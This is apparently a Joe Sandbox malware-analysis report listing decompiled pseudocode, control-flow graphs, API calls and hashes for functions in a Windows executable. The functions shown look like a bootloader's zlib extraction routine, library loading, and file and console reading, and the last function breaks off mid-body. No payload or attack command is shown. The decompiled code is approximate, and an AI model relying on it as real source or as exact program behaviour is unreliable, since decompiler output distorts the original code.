
                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 528 7ff6e5ab1050-7ff6e5ab10ab call 7ff6e5aba610 531 7ff6e5ab10d3-7ff6e5ab10eb call 7ff6e5ac40b0 528->531 532 7ff6e5ab10ad-7ff6e5ab10d2 call 7ff6e5ab2770 528->532 537 7ff6e5ab1109-7ff6e5ab1119 call 7ff6e5ac40b0 531->537 538 7ff6e5ab10ed-7ff6e5ab1104 call 7ff6e5ab24d0 531->538 544 7ff6e5ab1137-7ff6e5ab1147 537->544 545 7ff6e5ab111b-7ff6e5ab1132 call 7ff6e5ab24d0 537->545 543 7ff6e5ab126c-7ff6e5ab1281 call 7ff6e5aba2f0 call 7ff6e5ac409c * 2 538->543 560 7ff6e5ab1286-7ff6e5ab12a0 543->560 547 7ff6e5ab1150-7ff6e5ab1175 call 7ff6e5abf5fc 544->547 545->543 554 7ff6e5ab125e 547->554 555 7ff6e5ab117b-7ff6e5ab1185 call 7ff6e5abf370 547->555 558 7ff6e5ab1264 554->558 555->554 562 7ff6e5ab118b-7ff6e5ab1197 555->562 558->543 563 7ff6e5ab11a0-7ff6e5ab11c8 call 7ff6e5ab8a60 562->563 566 7ff6e5ab1241-7ff6e5ab125c call 7ff6e5ab2770 563->566 567 7ff6e5ab11ca-7ff6e5ab11cd 563->567 566->558 568 7ff6e5ab11cf-7ff6e5ab11d9 567->568 569 7ff6e5ab123c 567->569 571 7ff6e5ab1203-7ff6e5ab1206 568->571 572 7ff6e5ab11db-7ff6e5ab11e8 call 7ff6e5abfd3c 568->572 569->566 575 7ff6e5ab1208-7ff6e5ab1216 call 7ff6e5abbb60 571->575 576 7ff6e5ab1219-7ff6e5ab121e 571->576 578 7ff6e5ab11ed-7ff6e5ab11f0 572->578 575->576 576->563 577 7ff6e5ab1220-7ff6e5ab1223 576->577 580 7ff6e5ab1225-7ff6e5ab1228 577->580 581 7ff6e5ab1237-7ff6e5ab123a 577->581 582 7ff6e5ab11fe-7ff6e5ab1201 578->582 583 7ff6e5ab11f2-7ff6e5ab11fc call 7ff6e5abf370 578->583 580->566 585 7ff6e5ab122a-7ff6e5ab1232 580->585 581->558 582->566 583->576 583->582 585->547
                                                                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB1050(long long __rax, long long __rcx, long long __rdx, void* __r8, void* __r9) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t40 = __r9;
                                                                                                                                                                                                                                                        				_t39 = __r8;
                                                                                                                                                                                                                                                        				_t18 = __rax;
                                                                                                                                                                                                                                                        				 *((long long*)(_t36 + 0x10)) = __rdx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t36 + 8)) = __rcx;
                                                                                                                                                                                                                                                        				_push(_t34);
                                                                                                                                                                                                                                                        				_t37 = _t36 - 0x88;
                                                                                                                                                                                                                                                        				 *((long long*)(_t37 + 0x50)) = __rax;
                                                                                                                                                                                                                                                        				 *((long long*)(_t37 + 0x58)) = __rax;
                                                                                                                                                                                                                                                        				 *((long long*)(_t37 + 0x60)) = __rax;
                                                                                                                                                                                                                                                        				_t6 = _t18 + 0x58; // 0x58
                                                                                                                                                                                                                                                        				r8d = _t6;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t37 + 0x28)) = 0;
                                                                                                                                                                                                                                                        				 *((long long*)(_t37 + 0x20)) = __rax;
                                                                                                                                                                                                                                                        				_t13 = E00007FF67FF6E5ABA610(__rdx, _t37 + 0x20, "1.2.13"); // executed
                                                                                                                                                                                                                                                        				r15d = _t13;
                                                                                                                                                                                                                                                        				if (_t13 == 0) goto 0xe5ab10d3;
                                                                                                                                                                                                                                                        				r8d = _t13;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2770(_t18, "Failed to extract %s: inflateInit() failed with return code %d!\n", __rdx + 0x12, _t39, _t40, _t44, _t41, _t28, _t31);
                                                                                                                                                                                                                                                        				_t11 = _t34 - 1; // -1
                                                                                                                                                                                                                                                        				return _t11;
                                                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                                                        0x7ff6e5ab1050
                                                                                                                                                                                                                                                        0x7ff6e5ab1050
                                                                                                                                                                                                                                                        0x7ff6e5ab1050
                                                                                                                                                                                                                                                        0x7ff6e5ab1050
                                                                                                                                                                                                                                                        0x7ff6e5ab1055
                                                                                                                                                                                                                                                        0x7ff6e5ab105b
                                                                                                                                                                                                                                                        0x7ff6e5ab1062
                                                                                                                                                                                                                                                        0x7ff6e5ab1071
                                                                                                                                                                                                                                                        0x7ff6e5ab1079
                                                                                                                                                                                                                                                        0x7ff6e5ab1085
                                                                                                                                                                                                                                                        0x7ff6e5ab108a
                                                                                                                                                                                                                                                        0x7ff6e5ab108a
                                                                                                                                                                                                                                                        0x7ff6e5ab108e
                                                                                                                                                                                                                                                        0x7ff6e5ab1097
                                                                                                                                                                                                                                                        0x7ff6e5ab10a1
                                                                                                                                                                                                                                                        0x7ff6e5ab10a6
                                                                                                                                                                                                                                                        0x7ff6e5ab10ab
                                                                                                                                                                                                                                                        0x7ff6e5ab10b1
                                                                                                                                                                                                                                                        0x7ff6e5ab10bb
                                                                                                                                                                                                                                                        0x7ff6e5ab10c0
                                                                                                                                                                                                                                                        0x7ff6e5ab10d2

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                        • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                        • API String ID: 2030045667-1655038675
                                                                                                                                                                                                                                                        • Opcode ID: bd556a1dfc1f85a4d8702e4ddb2f3878f7c587586ed92518f812d2799d7a44d6
                                                                                                                                                                                                                                                        • Instruction ID: baa4051ab7a4b0eeb7b8e40c10308bc68a361b265e4cdde0eb47f74950ed3126
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd556a1dfc1f85a4d8702e4ddb2f3878f7c587586ed92518f812d2799d7a44d6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8451D423B0868685EAA0BB19E4603BA6290FF44F94F444135DE4DC7789EF3EED44C789
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACDDB8(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                                                                        				signed long long _t56;
                                                                                                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                                                                                                        				signed long long _t71;
                                                                                                                                                                                                                                                        				signed long long _t72;
                                                                                                                                                                                                                                                        				long long _t78;
                                                                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                                                                        				signed long long _t88;
                                                                                                                                                                                                                                                        				signed long long _t89;
                                                                                                                                                                                                                                                        				signed long long _t90;
                                                                                                                                                                                                                                                        				long _t91;
                                                                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                                                                        				WCHAR* _t97;
                                                                                                                                                                                                                                                        				WCHAR* _t102;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				 *((long long*)(_t82 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t82 + 0x10)) = _t78;
                                                                                                                                                                                                                                                        				 *((long long*)(_t82 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				_push(_t71);
                                                                                                                                                                                                                                                        				r15d = __ecx;
                                                                                                                                                                                                                                                        				_t72 = _t71 | 0xffffffff;
                                                                                                                                                                                                                                                        				_t89 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t88 =  *(0x7ff6e5ab0000 + 0x4cf10 + _t102 * 8) ^ _t89;
                                                                                                                                                                                                                                                        				asm("dec ecx");
                                                                                                                                                                                                                                                        				if (_t88 == _t72) goto 0xe5acdefb;
                                                                                                                                                                                                                                                        				if (_t88 == 0) goto 0xe5acde1d;
                                                                                                                                                                                                                                                        				_t56 = _t88;
                                                                                                                                                                                                                                                        				goto 0xe5acdefd;
                                                                                                                                                                                                                                                        				if (__r8 == __r9) goto 0xe5acdee0;
                                                                                                                                                                                                                                                        				_t60 =  *((intOrPtr*)(0x7ff6e5ab0000 + 0x4ce60 + __rsi * 8));
                                                                                                                                                                                                                                                        				if (_t60 == 0) goto 0xe5acde45;
                                                                                                                                                                                                                                                        				if (_t60 != _t72) goto 0xe5acdf3a;
                                                                                                                                                                                                                                                        				goto 0xe5acdecc;
                                                                                                                                                                                                                                                        				r8d = 0x800; // executed
                                                                                                                                                                                                                                                        				LoadLibraryW(_t102); // executed
                                                                                                                                                                                                                                                        				if (_t56 != 0) goto 0xe5acdf1a;
                                                                                                                                                                                                                                                        				if (GetLastError() != 0x57) goto 0xe5acdeba;
                                                                                                                                                                                                                                                        				_t14 = _t56 - 0x50; // -80
                                                                                                                                                                                                                                                        				_t35 = _t14;
                                                                                                                                                                                                                                                        				r8d = _t35;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AC9A00(__r8) == 0) goto 0xe5acdeba;
                                                                                                                                                                                                                                                        				r8d = _t35;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AC9A00(__r8) == 0) goto 0xe5acdeba;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				LoadLibraryExW(_t97, _t94, _t91);
                                                                                                                                                                                                                                                        				if (_t56 != 0) goto 0xe5acdf1a;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(0x7ff6e5ab0000 + 0x4ce60 + __rsi * 8)) = _t72;
                                                                                                                                                                                                                                                        				if (__r8 + 4 != __r9) goto 0xe5acde26;
                                                                                                                                                                                                                                                        				_t90 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				 *(0x7ff6e5ab0000 + 0x4cf10 + _t102 * 8) = _t72 ^ _t90;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}

















                                                                                                                                                                                                                                                        0x7ff6e5acddb8
                                                                                                                                                                                                                                                        0x7ff6e5acddbd
                                                                                                                                                                                                                                                        0x7ff6e5acddc2
                                                                                                                                                                                                                                                        0x7ff6e5acddc7
                                                                                                                                                                                                                                                        0x7ff6e5acddd4
                                                                                                                                                                                                                                                        0x7ff6e5acddde
                                                                                                                                                                                                                                                        0x7ff6e5acddf4
                                                                                                                                                                                                                                                        0x7ff6e5acddfb
                                                                                                                                                                                                                                                        0x7ff6e5acde04
                                                                                                                                                                                                                                                        0x7ff6e5acde0a
                                                                                                                                                                                                                                                        0x7ff6e5acde13
                                                                                                                                                                                                                                                        0x7ff6e5acde15
                                                                                                                                                                                                                                                        0x7ff6e5acde18
                                                                                                                                                                                                                                                        0x7ff6e5acde20
                                                                                                                                                                                                                                                        0x7ff6e5acde29
                                                                                                                                                                                                                                                        0x7ff6e5acde35
                                                                                                                                                                                                                                                        0x7ff6e5acde3a
                                                                                                                                                                                                                                                        0x7ff6e5acde40
                                                                                                                                                                                                                                                        0x7ff6e5acde52
                                                                                                                                                                                                                                                        0x7ff6e5acde58
                                                                                                                                                                                                                                                        0x7ff6e5acde64
                                                                                                                                                                                                                                                        0x7ff6e5acde73
                                                                                                                                                                                                                                                        0x7ff6e5acde75
                                                                                                                                                                                                                                                        0x7ff6e5acde75
                                                                                                                                                                                                                                                        0x7ff6e5acde7b
                                                                                                                                                                                                                                                        0x7ff6e5acde8c
                                                                                                                                                                                                                                                        0x7ff6e5acde8e
                                                                                                                                                                                                                                                        0x7ff6e5acdea2
                                                                                                                                                                                                                                                        0x7ff6e5acdea4
                                                                                                                                                                                                                                                        0x7ff6e5acdeac
                                                                                                                                                                                                                                                        0x7ff6e5acdeb8
                                                                                                                                                                                                                                                        0x7ff6e5acdec4
                                                                                                                                                                                                                                                        0x7ff6e5acded3
                                                                                                                                                                                                                                                        0x7ff6e5acded9
                                                                                                                                                                                                                                                        0x7ff6e5acdeed
                                                                                                                                                                                                                                                        0x7ff6e5acdef3
                                                                                                                                                                                                                                                        0x7ff6e5acdf19

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF6E5ACE152,?,?,-00000018,00007FF6E5ACA223,?,?,?,00007FF6E5ACA11A,?,?,?,00007FF6E5AC5472), ref: 00007FF6E5ACDF34
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000,?,00007FF6E5ACE152,?,?,-00000018,00007FF6E5ACA223,?,?,?,00007FF6E5ACA11A,?,?,?,00007FF6E5AC5472), ref: 00007FF6E5ACDF40
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                        • Opcode ID: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                                                                                                                                                                                                                        • Instruction ID: 839d41ddb2dc2ff8c59e05343696e6b9496633a70ec654806d4a40f2cb9023d4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E41F223B1965281FB56DB1A98207752392BF15F90F484139DD0EDB788EF3EEC45834A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 686 7ff6e5acaf2c-7ff6e5acaf52 687 7ff6e5acaf54-7ff6e5acaf68 call 7ff6e5ac4424 call 7ff6e5ac4444 686->687 688 7ff6e5acaf6d-7ff6e5acaf71 686->688 706 7ff6e5acb35e 687->706 690 7ff6e5acb347-7ff6e5acb353 call 7ff6e5ac4424 call 7ff6e5ac4444 688->690 691 7ff6e5acaf77-7ff6e5acaf7e 688->691 708 7ff6e5acb359 call 7ff6e5ac9db0 690->708 691->690 694 7ff6e5acaf84-7ff6e5acafb2 691->694 694->690 695 7ff6e5acafb8-7ff6e5acafbf 694->695 698 7ff6e5acafc1-7ff6e5acafd3 call 7ff6e5ac4424 call 7ff6e5ac4444 695->698 699 7ff6e5acafd8-7ff6e5acafdb 695->699 698->708 704 7ff6e5acb343-7ff6e5acb345 699->704 705 7ff6e5acafe1-7ff6e5acafe7 699->705 709 7ff6e5acb361-7ff6e5acb378 704->709 705->704 710 7ff6e5acafed-7ff6e5acaff0 705->710 706->709 708->706 710->698 713 7ff6e5acaff2-7ff6e5acb017 710->713 715 7ff6e5acb04a-7ff6e5acb051 713->715 716 7ff6e5acb019-7ff6e5acb01b 713->716 717 7ff6e5acb053-7ff6e5acb07b call 7ff6e5accacc call 7ff6e5ac9e18 * 2 715->717 718 7ff6e5acb026-7ff6e5acb03d call 7ff6e5ac4424 call 7ff6e5ac4444 call 7ff6e5ac9db0 715->718 719 7ff6e5acb042-7ff6e5acb048 716->719 720 7ff6e5acb01d-7ff6e5acb024 716->720 749 7ff6e5acb07d-7ff6e5acb093 call 7ff6e5ac4444 call 7ff6e5ac4424 717->749 750 7ff6e5acb098-7ff6e5acb0c3 call 7ff6e5acb754 717->750 747 7ff6e5acb1d0 718->747 721 7ff6e5acb0c8-7ff6e5acb0df 719->721 720->718 720->719 724 7ff6e5acb0e1-7ff6e5acb0e9 721->724 725 7ff6e5acb15a-7ff6e5acb164 call 7ff6e5ad2a3c 721->725 724->725 728 7ff6e5acb0eb-7ff6e5acb0ed 724->728 736 7ff6e5acb1ee 725->736 737 7ff6e5acb16a-7ff6e5acb17f 725->737 728->725 734 7ff6e5acb0ef-7ff6e5acb105 728->734 734->725 739 7ff6e5acb107-7ff6e5acb113 734->739 745 7ff6e5acb1f3-7ff6e5acb213 ReadFile 736->745 737->736 741 7ff6e5acb181-7ff6e5acb193 GetConsoleMode 737->741 739->725 743 7ff6e5acb115-7ff6e5acb117 739->743 741->736 746 7ff6e5acb195-7ff6e5acb19d 741->746 743->725 748 7ff6e5acb119-7ff6e5acb131 743->748 751 7ff6e5acb30d-7ff6e5acb316 GetLastError 745->751 752 7ff6e5acb219-7ff6e5acb221 745->752 746->745 755 7ff6e5acb19f-7ff6e5acb1c1 ReadConsoleW 746->755 758 7ff6e5acb1d3-7ff6e5acb1dd call 7ff6e5ac9e18 747->758 748->725 759 7ff6e5acb133-7ff6e5acb13f 748->759 749->747 750->721 756 7ff6e5acb333-7ff6e5acb336 751->756 757 7ff6e5acb318-7ff6e5acb32e call 7ff6e5ac4444 call 7ff6e5ac4424 751->757 752->751 753 7ff6e5acb227 752->753 761 7ff6e5acb22e-7ff6e5acb243 753->761 763 7ff6e5acb1e2-7ff6e5acb1ec 755->763 764 7ff6e5acb1c3 GetLastError 755->764 768 7ff6e5acb33c-7ff6e5acb33e 756->768 769 7ff6e5acb1c9-7ff6e5acb1cb call 7ff6e5ac43b8 756->769 757->747 758->709 759->725 767 7ff6e5acb141-7ff6e5acb143 759->767 761->758 771 7ff6e5acb245-7ff6e5acb250 761->771 763->761 764->769 767->725 775 7ff6e5acb145-7ff6e5acb155 767->775 768->758 769->747 778 7ff6e5acb252-7ff6e5acb26b call 7ff6e5acab44 771->778 779 7ff6e5acb277-7ff6e5acb27f 771->779 775->725 786 7ff6e5acb270-7ff6e5acb272 778->786 782 7ff6e5acb281-7ff6e5acb293 779->782 783 7ff6e5acb2fb-7ff6e5acb308 call 7ff6e5aca984 779->783 787 7ff6e5acb295 782->787 788 7ff6e5acb2ee-7ff6e5acb2f6 782->788 783->786 786->758 790 7ff6e5acb29a-7ff6e5acb2a1 787->790 788->758 791 7ff6e5acb2a3-7ff6e5acb2a7 790->791 792 7ff6e5acb2dd-7ff6e5acb2e8 790->792 793 7ff6e5acb2c3 791->793 794 7ff6e5acb2a9-7ff6e5acb2b0 791->794 792->788 796 7ff6e5acb2c9-7ff6e5acb2d9 793->796 794->793 795 7ff6e5acb2b2-7ff6e5acb2b6 794->795 795->793 798 7ff6e5acb2b8-7ff6e5acb2c1 795->798 796->790 797 7ff6e5acb2db 796->797 797->788 798->796
                                                                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACAF2C(void* __ebx, signed int __ecx, intOrPtr* __rax, long long __rbx, long long __rdx, char _a8, long long _a16, long long _a24, intOrPtr _a32) {
                                                                                                                                                                                                                                                        				void* _v72;
                                                                                                                                                                                                                                                        				long long _v80;
                                                                                                                                                                                                                                                        				signed int _v88;
                                                                                                                                                                                                                                                        				long long _v96;
                                                                                                                                                                                                                                                        				void* _v104;
                                                                                                                                                                                                                                                        				unsigned long long _v120;
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				char _t142;
                                                                                                                                                                                                                                                        				int _t151;
                                                                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                                                                                        				char _t170;
                                                                                                                                                                                                                                                        				char _t171;
                                                                                                                                                                                                                                                        				signed int _t175;
                                                                                                                                                                                                                                                        				signed char _t178;
                                                                                                                                                                                                                                                        				void* _t198;
                                                                                                                                                                                                                                                        				void* _t199;
                                                                                                                                                                                                                                                        				void* _t200;
                                                                                                                                                                                                                                                        				unsigned int _t202;
                                                                                                                                                                                                                                                        				void* _t205;
                                                                                                                                                                                                                                                        				long long _t210;
                                                                                                                                                                                                                                                        				long long _t246;
                                                                                                                                                                                                                                                        				intOrPtr _t247;
                                                                                                                                                                                                                                                        				signed long long _t254;
                                                                                                                                                                                                                                                        				signed short* _t258;
                                                                                                                                                                                                                                                        				intOrPtr* _t260;
                                                                                                                                                                                                                                                        				char* _t263;
                                                                                                                                                                                                                                                        				signed long long _t278;
                                                                                                                                                                                                                                                        				void* _t280;
                                                                                                                                                                                                                                                        				unsigned long long _t285;
                                                                                                                                                                                                                                                        				void* _t286;
                                                                                                                                                                                                                                                        				signed long long _t291;
                                                                                                                                                                                                                                                        				signed long long _t292;
                                                                                                                                                                                                                                                        				unsigned long long _t293;
                                                                                                                                                                                                                                                        				signed short* _t295;
                                                                                                                                                                                                                                                        				signed short* _t301;
                                                                                                                                                                                                                                                        				signed short* _t302;
                                                                                                                                                                                                                                                        				unsigned long long _t306;
                                                                                                                                                                                                                                                        				signed long long _t308;
                                                                                                                                                                                                                                                        				char* _t310;
                                                                                                                                                                                                                                                        				char* _t311;
                                                                                                                                                                                                                                                        				char* _t312;
                                                                                                                                                                                                                                                        				signed long long _t313;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t273 = __rdx;
                                                                                                                                                                                                                                                        				_t162 = __ebx;
                                                                                                                                                                                                                                                        				_a24 = __rbx;
                                                                                                                                                                                                                                                        				_a16 = __rdx;
                                                                                                                                                                                                                                                        				r12d = r8d;
                                                                                                                                                                                                                                                        				if (r13d != 0xfffffffe) goto 0xe5acaf6d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4424(__rax);
                                                                                                                                                                                                                                                        				 *__rax = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(__rax);
                                                                                                                                                                                                                                                        				 *__rax = 9;
                                                                                                                                                                                                                                                        				goto 0xe5acb35e;
                                                                                                                                                                                                                                                        				if (__ecx < 0) goto 0xe5acb347;
                                                                                                                                                                                                                                                        				_t205 = r13d -  *0xe5afce30; // 0x40
                                                                                                                                                                                                                                                        				if (_t205 >= 0) goto 0xe5acb347;
                                                                                                                                                                                                                                                        				_t3 = _t285 + 1; // 0x1
                                                                                                                                                                                                                                                        				_t178 = _t3;
                                                                                                                                                                                                                                                        				_v80 = __rdx;
                                                                                                                                                                                                                                                        				_t291 = __ecx >> 6;
                                                                                                                                                                                                                                                        				_v88 = _t291;
                                                                                                                                                                                                                                                        				_t308 = __ecx + __ecx * 8;
                                                                                                                                                                                                                                                        				_t246 =  *((intOrPtr*)(0xe5afca30 + _t291 * 8));
                                                                                                                                                                                                                                                        				if (( *(_t246 + 0x38 + _t308 * 8) & _t178) == 0) goto 0xe5acb347;
                                                                                                                                                                                                                                                        				if (r12d - 0x7fffffff <= 0) goto 0xe5acafd8;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4424(_t246);
                                                                                                                                                                                                                                                        				 *_t246 = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t246);
                                                                                                                                                                                                                                                        				 *_t246 = 0x16;
                                                                                                                                                                                                                                                        				goto 0xe5acb359;
                                                                                                                                                                                                                                                        				if (r12d == 0) goto 0xe5acb343;
                                                                                                                                                                                                                                                        				if (( *(_t246 + 0x38 + _t308 * 8) & 0x00000002) != 0) goto 0xe5acb343;
                                                                                                                                                                                                                                                        				_t210 = __rdx;
                                                                                                                                                                                                                                                        				if (_t210 == 0) goto 0xe5acafc1;
                                                                                                                                                                                                                                                        				r10d =  *((char*)(_t246 + 0x39 + _t308 * 8));
                                                                                                                                                                                                                                                        				_v96 =  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8));
                                                                                                                                                                                                                                                        				_a8 = r10b;
                                                                                                                                                                                                                                                        				if (_t210 == 0) goto 0xe5acb04a;
                                                                                                                                                                                                                                                        				if (r10d - _t178 != _t178) goto 0xe5acb042;
                                                                                                                                                                                                                                                        				if ((_t178 &  !r12d) != 0) goto 0xe5acb042;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4424(_t246);
                                                                                                                                                                                                                                                        				 *_t246 = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t246);
                                                                                                                                                                                                                                                        				 *_t246 = 0x16;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				goto 0xe5acb1d0;
                                                                                                                                                                                                                                                        				goto 0xe5acb0c8;
                                                                                                                                                                                                                                                        				if ((_t178 &  !r12d) == 0) goto 0xe5acb026;
                                                                                                                                                                                                                                                        				_t198 =  <  ? 4 : r12d >> 1;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACCACC(_t246,  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8)));
                                                                                                                                                                                                                                                        				_t263 = _t246;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t246,  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8)));
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t246,  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8)));
                                                                                                                                                                                                                                                        				_t310 = _t263;
                                                                                                                                                                                                                                                        				if (_t263 != 0) goto 0xe5acb098;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t246);
                                                                                                                                                                                                                                                        				 *_t246 = 0xc;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4424(_t246);
                                                                                                                                                                                                                                                        				 *_t246 = 8;
                                                                                                                                                                                                                                                        				goto 0xe5acb1d0;
                                                                                                                                                                                                                                                        				_t32 = _t273 + 1; // 0x1
                                                                                                                                                                                                                                                        				r8d = _t32;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACB754(_t246, _t263, _t280);
                                                                                                                                                                                                                                                        				_t292 = _v88;
                                                                                                                                                                                                                                                        				r10b = _a8;
                                                                                                                                                                                                                                                        				 *((long long*)( *((intOrPtr*)(0xe5afca30 + _t292 * 8)) + 0x30 + _t308 * 8)) = _t246;
                                                                                                                                                                                                                                                        				_t247 =  *((intOrPtr*)(0xe5afca30 + _t292 * 8));
                                                                                                                                                                                                                                                        				_v72 = _t310;
                                                                                                                                                                                                                                                        				r9d = 0xa;
